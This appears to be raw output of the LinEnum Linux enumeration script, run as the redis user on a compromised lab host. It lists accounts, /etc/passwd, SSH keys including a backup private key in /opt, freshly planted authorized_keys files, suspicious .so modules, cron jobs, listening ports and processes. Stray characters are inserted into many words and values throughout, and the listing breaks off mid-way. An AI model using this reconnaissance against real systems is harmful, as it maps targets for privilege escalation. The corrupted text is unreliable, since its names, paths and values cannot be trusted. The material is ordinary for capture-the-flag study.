gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(uuidd) gid=109(uuidd) groups=109(uuidd) uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(Matt) gid=1000(Matt) groups=1000(Matt) uid=107(redis) gid=114(redis) groups=114(redis) [-] It looks like we have some admin users: uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemRon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin sSyslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin Matt:x:1000:1000:,,,:/home/Matt:/bin/bash redis:x:107:114::/var/lib/redis:/bin/bash [-] Super user account(s): root [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Sep 11 2019 . drwxr-xr-x 22 root root 4.0K Aug 25 2019 .. drwxr-xr-x 6 Matt Matt 4.0K Sep 11 2019 Matt [-] Files owned by our user: -rw-rw---- 1 redis redis 4 Jul 13 18:55 /run/redis/redis-server.pid -rw-r----- 1 redis redis 58859 Oct 29 2019 /etc/redis/redis.conf -rwxrwxr-x 1 redis redis 46631 Jul 13 19:54 /tmp/LinEnum.sh -rw-rw-r-- 1 redis redis 5315 Jul 13 19:59 /tmp/output.txt -rw-rw---- 1 redis redis 32772 Jul 13 19:52 /var/log/redis/redis-server.log -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/ibortfgqT.so -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history -rw-rw---- 1 redis redis 683 Jul 13 19:52 /var/lib/redis/.ssh/authorized_keys -rw-r----- 1 redis redis 46760 Aug 26 2019 /var/lib/redis/dkixshbr.so -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/vlpaulhk.so -rw-r--r-- 1 redis redis 0 Aug 25 2019 /var/lib/redis/.cache/motd.legal-displayed -rw-r----- 1 redis redis 440656 Aug 25 2019 /var/lib/redis/module.o -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/qcbxxlig.so -rw-rw---- 1 redis redis 683 Jul 13 19:44 /var/lib/redis/authorized_keys -rw-rw---- 1 redis redis 92 Jul 13 19:40 /var/lib/redis/dump.rdb [-] Hidden files: -rw-r--r-- 1 root root 0 Jul 13 18:55 /run/network/.ifstate.lock -rw-r--r-- 1 Matt Matt 3771 Aug 25 2019 /home/Matt/.bashrc -rw------- 1 Matt Matt 1676 Sep 11 2019 /home/Matt/.bash_history -rw-rw-r-- 1 Matt Matt 66 Aug 26 2019 /home/Matt/.selected_editor -rw-r--r-- 1 Matt Matt 807 Aug 25 2019 /home/Matt/.profile -rw-rw-r-- 1 UMatt Matt 181 Aug 25 2019 /home/Matt/.wget-hsts -rw-r--r-- 1 Matt Matt 220 Aug 25 2019 /home/Matt/.bash_logout -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.d/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout -rw-r--r-- 1 root root 1531 Aug 24 2019 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.daily/.placeholder -rw------- 1 root root 0 Aug 24 2019 /etc/.pwd.lock -rw-r--r-- 1 root root 118 May 5 2019 /usr/share/webmin/smf/images/.del-left.gif-Dec-05-04 -rw-r--r-- 1 root root 31 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 154 Jan 28 2018 /usr/src/linuxV-headers-4.15.0-58/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 13 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/basic/.gitignore -rw-r--r-- 1 root root 55 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/mod/.gitignore -rw-r--r-- 1 root root 162 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/.gitignore -rw-r--r-- 1 root root 33 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 24 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/gcc-plugins/.gitignore -rw-r--r-- 1 root root 21 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 54 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/dtc/.gitignore -rw-r--r-- 1 root root 25 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 13740 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-genWeric/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 65952 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.cache.mk -rw-r--r-- 1 root root 217265 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.config.old -rw-r--r-- 1 root root 22 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.12725.d -rw-r--r-- 1 root root 217141 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.config -rw-r--r-- 1 root root 4128 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.fixdep.o.d -rw-r--r-- 1 root root 1815 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.objtool-in.o.cmd -rw-r--r-- 1 root root 7068 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.builtin-check.o.cmd -rw-r--r-- 1 root root 7780 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.special.o.cmd -rw-r--r-- 1 root root 8146 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.run-command.o.cmd -rw-r--r-- 1 root root 5702 Aug 6 2019 /usr/src/linux-heaXders-4.15.0-58-generic/tools/objtool/.libstring.o.cmd -rw-r--r-- 1 root root 7893 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.orc_gen.o.cmd -rw-r--r-- 1 root root 6249 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.objtool.o.cmd -rw-r--r-- 1 root root 7139 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.help.o.cmd -rw-r--r-- 1 root root 5008 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.fixdep.o.cmd -rw-r--r-- 1 root root 7330 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.builtin-orc.o.cmd -rw-r--r-- 1 root root 7969 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.check.o.cmd -rw-r--r-- 1 root root 1265 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.libsubcmd-in.o.cmd -rw-r--r-- 1 root root 6517 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.exec-cmd.o.cmd -rw-r--r-- 1 root root 5880 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-Ygeneric/tools/objtool/.sigchain.o.cmd -rw-r--r-- 1 root root 8207 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.orc_dump.o.cmd -rw-r--r-- 1 root root 6307 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.parse-options.o.cmd -rw-r--r-- 1 root root 2091 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.subcmd-config.o.cmd -rw-r--r-- 1 root root 6882 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.pager.o.cmd -rw-r--r-- 1 root root 458 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/arch/x86/.objtool-in.o.cmd -rw-r--r-- 1 root root 8549 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/arch/x86/.decode.o.cmd -rw-r--r-- 1 root root 8286 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.elf.o.cmd -rw-r--r-- 1 root root 4328 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.str_error_r.o.cmd -rw-r--r-- 1 root root 429 Aug 6 2019 /usr/src/linux-headers-4Z.15.0-58-generic/tools/objtool/.fixdep-in.o.cmd -rw-r--r-- 1 root root 962 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.missing-syscalls.d -rw-r--r-- 1 root root 3812 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 5553 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 6321 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 110 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 6749 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 3536 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 5474 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 1528 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/basic/.bin2c.cmd -rw-r--r[-- 1 root root 4799 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 104 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 6454 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 5820 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 3063 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 4820 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 3736 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 6203 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 129 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 5401 Aug\ 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.insert-sys-cert.cmd -rw-r--r-- 1 root root 4535 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.asn1_compiler.cmd -rw-r--r-- 1 root root 5861 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 4982 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 5243 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 5742 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 60043 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 9752 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 343 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.cache.mk -rw-r--r-- 1 root root 1544 Aug 6] 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 155 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3403 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 1524 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 1664 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root root 359 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.purgatory.ro.cmd -rw-r--r-- 1 root root 6445 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 root root 275 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd -rw-r--r-- 1 root root 300 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/^generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 280 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 252 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 276 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 364 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 252 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 280 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 4645 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs_64.o.cmd -rw-r--r-- 1 root root 4624 Aug 6 2019 /usr/src/linux-headers-4.15.0-5_8-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 root root 146 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 4645 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs_32.o.cmd -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history [-] World-readable files within /home: -rw-r--r-- 1 Matt Matt 3771 Aug 25 2019 /home/Matt/.bashrc -rw-rw-r-- 1 Matt Matt 66 Aug 26 2019 /home/Matt/.selected_editor -rw-r--r-- 1 Matt Matt 807 Aug 25 2019 /home/Matt/.profile -rw-rw-r-- 1 Matt Matt 181 Aug 25 2019 /home/Matt/.wget-hsts -rw-r--r-- 1 Matt Matt 220 Aug 25 2019 /home/Matt/.bash_logout [-] Home directory contents: total 664K drwxr-x--- 7 redis redis 4.0K Jul 13 19:44 . drwxr-xr-x 37 root root 4.0K Aug 25 2019 .. drwxr-xr-x 2 root root 4.0K Oct 25 2019 6379 -rw-rw---- 1 redis redis 683 Jul 13 19:44 authorized_keys -rw------- 1 redis redis 399 Oct 25 2019 .bash_history` drwx------ 2 redis redis 4.0K Aug 25 2019 .cache -rw-r----- 1 redis redis 46K Aug 26 2019 dkixshbr.so -rw-rw---- 1 redis redis 92 Jul 13 19:40 dump.rdb drwx------ 3 redis redis 4.0K Aug 25 2019 .gnupg -rw-r----- 1 redis redis 46K Aug 25 2019 ibortfgq.so drwxrwxr-x 3 redis redis 4.0K Aug 26 2019 .local -rw-r----- 1 redis redis 431K Aug 25 2019 module.o -rw-r----- 1 redis redis 46K Aug 25 2019 qcbxxlig.so drwxr-xr-x 2 redis root 4.0K Jul 13 19:52 .ssh -rw-r----- 1 redis redis 46K Aug 25 2019 vlpaulhk.so [-] SSH keys/host information found in the following locations: -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak -rw-rw---- 1 redis redis 683 Jul 13 19:52 /var/lib/redis/.ssh/authorized_keys -rw-rw---- 1 redis redis 683 Jul 13 19:44 /var/lib/redis/authorized_keys [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: SSH_CONNECTIaON=10.10.14.10 47360 10.10.10.160 22 LANG=en_US.UTF-8 OLDPWD=/var/lib/redis XDG_SESSION_ID=6 USER=redis PWD=/tmp HOME=/var/lib/redis SSH_CLIENT=10.10.14.10 47360 22 SSH_TTY=/dev/pts/0 MAIL=/var/mail/redis SHELL=/bin/bash TERM=xterm-256color SHLVL=2 LOGNAME=redis XDG_RUNTIME_DIR=/run/user/107 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games drwxr-xr-x 2 root root 4096 Aug 25 2019 /bin drwxr-xr-x 2 root root 4096 Oct 25 2019 /sbin drwxr-xr-x 2 root root 20480 Oct 25 2019 /usr/bin drwxr-xr-x 2 root root 4096 Apr 24 2018 /usr/games drwxr-xr-x 2 root root 4096 Aug 25 2019 /usr/local/bin drwxr-xr-x 2 root root 4096 Aug 24 2019 /usr/local/games drwxr-xr-x 2 root root 4096 Aug 24 2019 /usr/local/sbin drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/sbin [-] Available shells: # /etc/shells: valid login sheblls /bin/sh /bin/bash /bin/rbash /bin/dash [-] Current umask value: 0002 u=rwx,g=rwx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Aug 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root root 712 Jan 17 2018 php -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 191 Aug 24 2019 popularity-contest /etc/cron.daily: total 56 drwxr-xr-x 2 root root 4096 Aug 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rwxr-xr-x 1 root root 539 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 77 Sep 5 2008 apt-show-versions -rwxrc-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 16 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rw-r--r-- 1 root root 102 Nodv 16 2017 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Mon 2020-07-13 20:08:40 BST 9min left Mon 2020e-07-13 18:55:15 BST 1h 4min ago motd-news.timer motd-news.service Mon 2020-07-13 20:09:00 BST 9min left Mon 2020-07-13 19:39:01 BST 20min ago phpsessionclean.timer phpsessionclean.service Tue 2020-07-14 06:12:06 BST 10h left Mon 2020-07-13 18:55:15 BST 1h 4min ago apt-daily-upgrade.timer apt-daily-upgrade.service Tue 2020-07-14 11:51:32 BST 15h left Mon 2020-07-13 18:55:15 BST 1h 4min ago apt-daily.timer apt-daily.service Tue 2020-07-14 19:10:22 BST 23h left Mon 2020-07-13 19:10:22 BST 48min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2020-07-20 00:00:00 BST 6 days left Mon 2020-07-13 18:55:15 BST 1h 4min ago fstrim.timer fstrim.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service 7 timers listed. ### NETWORKING ########################################## [-] Network and IP info: ens33f: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.160 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 dead:beef::250:56ff:feb9:5ff3 prefixlen 64 scopeid 0x0<global> inet6 fe80::250:56ff:feb9:5ff3 prefixlen 64 scopeid 0x20<link> ether 00:50:56:b9:5f:f3 txqueuelen 1000 (Ethernet) RX packets 74083 bytes 5522516 (5.5 MB) RX errors 12 dropped 66 overruns 0 frame 0 TX packets 68265 bytes 3927953 (3.9 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 10298 bytes 731772 (731.7 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10298 bytes 731772 (731.7 KB) TX errors 0 dropped 0 overruns 0 cargrier 0 collisions 0 [-] ARP history: _gateway (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens33 [-] Nameserver(s): nameserver 127.0.0.53 [-] Nameserver(s): Global DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.harpa home internal intranet lan local private test Link 2 (ens33) Current Scopes: none LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no [-] Default route: default _gateway 0.0.0.0 UG 0 0 0 ens33 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN 599/redis-server 0. tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN i - tcp6 0 0 ::1:6379 :::* LISTEN 599/redis-server 0. tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:10000 0.0.0.0:* - udp 0 0 127.0.0.53:53 0.0.0.0:* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.9 159416 8796 ? Ss 18:55 0:02 /sbin/init splash root 2 0.0 0.0 0 0 ? j S 18:55 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 18:55 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 18:55 0:00 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 18:55 0:01 [rcu_sched] root 9 0.0 0.0 0 0 ? I 18:55 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 18:55 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 18:55 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 18:55 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 18:55 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? I< 18:55 0:00 [netns] root 15 0.0 0.0 0 0 ? S 18:55 0:00 [rcu_tasks_kthre] root 16 0.0 0.0 0 0 ? S 18:55 0:00 [kauditd] root 17 0.0 0.0 0 0k ? S 18:55 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S 18:55 0:00 [oom_reaper] root 19 0.0 0.0 0 0 ? I< 18:55 0:00 [writeback] root 20 0.0 0.0 0 0 ? S 18:55 0:00 [kcompactd0] root 21 0.0 0.0 0 0 ? SN 18:55 0:00 [ksmd] root 22 0.0 0.0 0 0 ? SN 18:55 0:00 [khugepaged] root 23 0.0 0.0 0 0 ? I< 18:55 0:00 [crypto] root 24 0.0 0.0 0 0 ? I< 18:55 0:00 [kintegrityd] root 25 0.0 0.0 0 0 ? I< 18:55 0:00 [kblockd] root 26 0.0 0.0 0 0 ? I< 18:55 0:00 [ata_sff] root 27 0.0 0.0 0 0 ? I< 18:55 0:00 [md] root 28 0.0 0.0 0 0 ? I< 18:55 0:00 [edac-poller] root 29 0.0 0.0 0 0 ? I< 18:55 0:00 [devfreq_wq] root 30 0.0 0.0 l 0 0 ? I< 18:55 0:00 [watchdogd] root 32 0.0 0.0 0 0 ? I 18:55 0:02 [kworker/0:1] root 34 0.0 0.0 0 0 ? S 18:55 0:00 [kswapd0] root 35 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/u257:0] root 36 0.0 0.0 0 0 ? S 18:55 0:00 [ecryptfs-kthrea] root 78 0.0 0.0 0 0 ? I< 18:55 0:00 [kthrotld] root 79 0.0 0.0 0 0 ? I< 18:55 0:00 [acpi_thermal_pm] root 80 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_0] root 81 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_0] root 82 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_1] root 83 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_1] root 86 0.0 0.0 0 0 ? I 18:55 0:00 [kworker/0:2] root 90 0.0 0.0 0 0 ? I< 18:55 0:00 [ipv6_amddrconf] root 99 0.0 0.0 0 0 ? I< 18:55 0:00 